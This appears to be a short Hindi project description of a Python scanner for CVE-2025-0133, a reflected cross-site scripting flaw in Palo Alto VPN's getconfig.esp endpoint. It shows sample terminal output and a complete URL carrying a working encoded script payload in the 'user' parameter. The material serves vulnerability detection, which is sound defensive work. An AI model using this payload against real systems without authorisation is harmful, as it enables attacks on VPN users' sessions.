
Palo Alto VPN में getconfig.esp एंडपॉइंट की जांच करके और XSS पेलोड इंजेक्ट करके CVE-2025-0133 रिफ्लेक्टेड XSS कमजोरी का पता लगाने के लिए Python स्क्रिप्ट।
पायथन में लिखी एक स्क्रिप्ट केवल CVE-2025-0133 रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग कमज़ोरी के अस्तित्व की जांच करने के लिए जो पालो ऑल्टो में होती है। दी गई स्क्रिप्ट का उपयोग करके getconfig.esp फ़ाइल का पता लगाया जाता है और XSS के लिए परीक्षण किया जाता है।
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] Sending initial probe to https://target.com/ssl-vpn/getconfig.esp
[+] Target is using "Palo Alto". Testing XSS...
[*] Sending XSS payload...
[+] Target is VULNERABLE to reflected XSS.
[+] URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer